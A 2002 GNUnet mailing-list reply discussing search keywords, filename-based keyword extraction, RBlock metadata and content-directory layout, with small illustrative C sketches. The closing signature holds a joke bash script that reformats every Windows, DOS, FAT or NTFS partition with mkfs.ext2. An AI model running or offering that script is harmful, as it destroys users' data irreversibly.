
From: Christian Grothoff
Subject: Re: [GNUnet-developers] useless crap??
Date: Mon, 29 Apr 2002 20:34:37 -0500

On Monday 29 April 2002 07:59 pm, you wrote:
> > mp3 is a bad keyword because it would (once the system works) return far
> > too many results. Thus gnunet-insert-mp3 will NOT automatically generate
> > that keyword.
>
> Right. Too many results is what I wanted. :)
>
> Actually mp3 would still be a useful keyword.  I search for "Metalica
> AND mp3" because I want music and not some other datatype.

That's the thing. The GNUnet 'AND' mechanism is not intended to sort
out datatypes. Obtaining 5,000 replies for a generic 'mp3' search is already
really bad practice on gnutella, and I did not want to encourage people to do
this here. Overly generic keywords also defeat the goal of deniability (people
can blacklist the query 'mp3'). Thus I decided not to make 'mp3' a default
keyword for gnunet-insert-mp3. You can of course still specify it manually
with gnunet-insert.

> But for testing, you need a standard test file that is very likely to
> be on every node.  Like the GPL example.  Just encourage everyone to
> fetch that file as a test every time a node is installed.  If that
> happens then it is likely to work for new nodes and makes a good smoke
> test to see if things are working.

True - especially once things are working :-)

> > Also we need a better scheme for automatic keyword
> > extraction from files because it is unrealistic that people will type
> > in lots of keywords manually for each file they make available.
>
> True. Your searching requires keywords because the only way data can
> be found is if the person who published the data thought of the same
> keyword that people use to search for it.  Since to begin with most
> content will just be copied from files obtained by other filesharing
> networks, the obvious method is to just split the filename on word
> boundaries and add each word.  In these networks that only allow
> searching filenames, people have put keywords in the filenames.

We are aiming for a generic keyword extraction API. Splitting filenames
would definitely be a reasonable choice.
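
For illustration, here is a minimal sketch of such an extractor in C
(the function name and the 'KeywordCallback' type are made up for this
example, not part of any existing GNUnet API). It splits on every
non-alphanumeric character, so 'Fade_To_Black.mp3' would yield the
keywords 'Fade', 'To', 'Black' and 'mp3':

#include <ctype.h>
#include <stddef.h>

typedef void (*KeywordCallback)(const char *keyword);

static void extract_keywords_from_filename(const char *filename,
                                           KeywordCallback add_keyword) {
  char word[256];
  size_t len = 0;
  const char *p = filename;

  for (;;) {
    if ((*p != '\0') && isalnum((unsigned char) *p)) {
      if (len + 1 < sizeof(word))
        word[len++] = *p;            /* accumulate the current word */
    } else {
      if (len > 0) {                 /* word boundary: emit the keyword */
        word[len] = '\0';
        add_keyword(word);
        len = 0;
      }
      if (*p == '\0')
        break;
    }
    p++;
  }
}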

> I actually find it somewhat surprising that filename is NOT stored.
> It could be encoded as part of the description. If I understand your
> arch correctly, you can't do a partial string search on filenames, but
> it would still save the user a lot of work.  I would like to be able to
> just use the "standard" name for a file when extracting it.

We could change the format of the root-node to include a default
filename. Sounds reasonable. Any objections/concerns/suggestions?
I could see splitting the 'description' field into three parts:
mime, filename and description (each variable length, preceded
by a short indicating the length). Any other ideas/suggestions/improvements
we should make to the RBlocks?
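
To make the proposal concrete, a rough sketch of the serialization
(the names are illustrative only; the actual RBlock layout is exactly
what is up for discussion here):

#include <arpa/inet.h>   /* htons */
#include <string.h>

/* Append one field: a short (network byte order) giving the length,
   followed by the bytes of the string itself. */
static size_t put_field(char *out, const char *s) {
  unsigned short len  = (unsigned short) strlen(s);
  unsigned short nlen = htons(len);

  memcpy(out, &nlen, sizeof(nlen));
  memcpy(out + sizeof(nlen), s, len);
  return sizeof(nlen) + len;
}

/* Serialize the three proposed parts back-to-back. */
static size_t serialize_root_meta(char *out, const char *mime,
                                  const char *filename,
                                  const char *description) {
  size_t off = 0;
  off += put_field(out + off, mime);
  off += put_field(out + off, filename);
  off += put_field(out + off, description);
  return off;
}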

> (In fact, I might want to also save a .meta file for each thing
> downloaded that contains the description and list of keywords, so that
> the file can be uploaded again later idempotently.  What happens if
> two people publish the same file with different keywords and
> descriptions?)

You can find the same file under all of the keywords used and download it
from both sources in parallel (GNUnet can assemble a file from different
sources while guaranteeing its integrity, see the 'Encoding' paper). What
you can thus do is just insert the file again with *additional* keywords (or
none); it can still be found as long as the existing keywords are around (and
because people search more often than they download, keyword-blocks should
have a high replication rate and thus a higher chance of survival than the
associated content). Thus a .meta file is not required for re-insertion.
Worse, exposing *all* keywords associated with a file could be used for
censorship (I download the file, learn all the keywords, and then blacklist
all of them). Having keywords for a file that are hard to obtain (i.e. not
derivable automatically from the file/RNode) is therefore usually a good
thing (TM). This may actually be a reason for *not* supplying a filename (or
at least not one that was used for keyword extraction).
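
For the curious, the reason parallel downloads from untrusted sources
stay safe is that every block is requested under its cryptographic
hash, so each block can be verified independently no matter which peer
delivered it. A minimal sketch, with 'HashCode' and 'compute_hash'
standing in for the real primitives from the 'Encoding' paper:

#include <stddef.h>
#include <string.h>

#define HASH_SIZE 20   /* assumption: digest size in bytes */

typedef struct {
  unsigned char bits[HASH_SIZE];
} HashCode;

/* Assumed to exist elsewhere: hashes 'len' bytes at 'data'. */
extern void compute_hash(const void *data, size_t len, HashCode *out);

/* Accept a block from an arbitrary peer only if it matches the
   hash under which it was requested. */
static int block_is_authentic(const void *data, size_t len,
                              const HashCode *expected) {
  HashCode actual;

  compute_hash(data, len, &actual);
  return 0 == memcmp(&actual, expected, sizeof(HashCode));
}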

> > There may also be performance issues (e.g. how does ext2 behave if
> > data/content contains 1 million 1k files? Use reiserfs? database?);
>
> The thing I see right now is that ~/.gnunet/data/content is a flat
> directory.  In most filesystems, directories are NOT indexed and you
> have to do a linear scan any time you want to find a file.  So you
> should do like everyone else and add a couple more directory levels.
> (~/.gnunet/data/content/FE/4F/FE4F8155230050000000000065100000C79CA8BA)
> This way the directory is not too big.  I don't know the ideal number
> of levels or number of bits at each level, but I KNOW a flat directory
> will be really slow on ext2.

That's exactly what I also thought. I'm just not sure that splitting
the directory like that is the best idea (I'm still pondering the
issue; until I have a really good solution, it'll probably just stay in 'slow
mode'). And of course, using a better FS (reiser, ext3, xfs) is recommended.
It would be nice to have some profiling code to actually evaluate different
approaches/filesystems in order to give users (educated) advice on which FS
to use.
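
Just to illustrate the mechanics of the split (two levels of 8 bits
each here, but the right number of levels/bits is exactly the open
question; the function is hypothetical, not existing GNUnet code):

#include <stdio.h>

/* Build the split path from the hex name of a content file. */
static void content_path(char *out, size_t outlen,
                         const char *basedir, const char *hexname) {
  snprintf(out, outlen, "%s/%c%c/%c%c/%s",
           basedir,
           hexname[0], hexname[1],
           hexname[2], hexname[3],
           hexname);
}

So content_path(buf, sizeof buf, "~/.gnunet/data/content",
"FE4F8155230050000000000065100000C79CA8BA") yields exactly the layout
from your example.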

> I use reiserfs so it isn't really a problem there.  The filesize is
> also problematic in the long run.  Do you intend multiple nodes to
> share this directory?  If not, I would just implement a large file
> based hash.

While access could be shared between multiple nodes, this does not really
make much sense (except if you have a fat NFS server and multiple
clients with slow CPUs and you want to balance the load of the encryption;
and by slow CPUs I mean less than a Pentium, because otherwise the CPU load
should not really matter that much).

What do you mean by 'a large file based hash'? 

> > GNUnet is not really ready for the masses yet.
>
> OK, I will try not to be the masses.

:-)

Christian
-- 
______________________________________________________
|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i & done
echo -e "\n\n\t\tMay the source be with you.\n\n"


